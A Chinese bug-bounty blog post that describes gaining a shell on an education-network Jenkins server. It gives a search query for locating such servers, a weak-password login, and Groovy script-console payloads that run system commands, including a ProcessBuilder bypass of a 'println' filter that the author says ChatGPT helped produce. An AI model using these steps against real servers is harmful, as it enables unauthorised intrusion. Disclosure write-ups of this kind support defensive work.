EDUSRC-记一个SHELL捡漏

目录

​编辑

[Jenkins - println绕过到shell命令执行](#Jenkins - println绕过到shell命令执行)

语法

Jenkins未授权访问(捡漏失败)

Jenkins捡漏

弱口令

脚本执行(println失败)

CHATGPT调教绕过

hack渗透视频教程,扫码免费领


Jenkins - println绕过到shell命令执行

语法

  1. org="China Education and Research Network Center" && icon_hash="81586312"

语法说明:两个部分

org表示筛选的目标为edu组织

icon_hash筛选的是图标,特定Jenkins系列中的某一个图标

Jenkins未授权访问(捡漏失败)

熟悉Jenkins的应该清楚,若配置不当可直接未授权访问

通常来说该类的标题可以搜索title="Dashboard"

通常来说该类的标题可以搜索title="Dashboard"

Jenkins捡漏

弱口令

在浏览信息收集的过程中发现如下登录框

浅浅试了一下弱口令,进去了~

脚本执行(println失败)

进入之后我们会来到/script端点下的命令行,执行groovy script脚本做到类命令执行的操作

复制代码
  1. Groovy脚本是一种基于Java语法的动态编程语言。它在Java平台上运行,并且与Java语言高度兼容。Groovy提供了许多特性和语法糖,使得编写代码更加简洁和易读。

由于基于Java语法,因此可以用以下语句测试进行执行验证

复制代码
  1. println "whoami".execute().text
复制代码
  1. 在Groovy脚本中,println是用于在控制台输出消息的方法。而execute().text是用于在执行命令时获取命令输出的方式。

案例如下

但是在实际测试过程中输入println发现直接未响应,而输入其他的未发生

因此发现了过滤(这边漏洞已修,忘记截图ing)

CHATGPT调教绕过

通过测试清楚了是println被过滤之后,直接使用CHATGPT进行漫长的调教

由于是之前进行调教的,这里放出结果,最终找到的替代方法

复制代码
  1. def command = ["whoami"]
  2. def process = new ProcessBuilder(command).start()
  3. def inputStream = process.getInputStream()
  4. def result = new Scanner(inputStream).useDelimiter("\\A").next()
  5. print(result)

hack渗透视频教程,扫码免费领

相关推荐
Lhappy嘻嘻5 小时前
Java IO|File 文件操作 + 字节流 / 字符流完整笔记 + 递归删除文件实战
java·笔记·php
胡萝卜术5 小时前
从API调用到手写LRU:力扣146「LRU缓存」的哈希表+双向链表终极进化之路
前端·javascript·面试
科技道人5 小时前
记录 默认置灰/禁用 app ‘Search Engine Selector‘ 的disable按钮
开发语言·前端·javascript
伊玛目的门徒5 小时前
试用leetcode之典中典 二数之和问题
java·算法·leetcode
天疆说5 小时前
Zotero Connector 在 Edge 里找不到桌面 Zotero(Linux / Zotero 9.0.6 / Edge 150)
linux·前端·edge
李伟_Li慢慢7 小时前
02-从硬件说起WebGL
前端·three.js
QYR-分析7 小时前
机器人安全控制器行业高速扩容 本土替代迎来全新发展窗口期
人工智能·安全·机器人
IpdataCloud7 小时前
担心IP暴露隐私?用安全IP查询工具自查,三步配置网络出口
网络·tcp/ip·安全·ip
xy34538 小时前
wireshark 如何捕获信息
网络·测试工具·渗透测试·wireshark
kyriewen8 小时前
看了微软几万人用AI编程的数据——效率涨24%的代价没人提
前端·ai编程·claude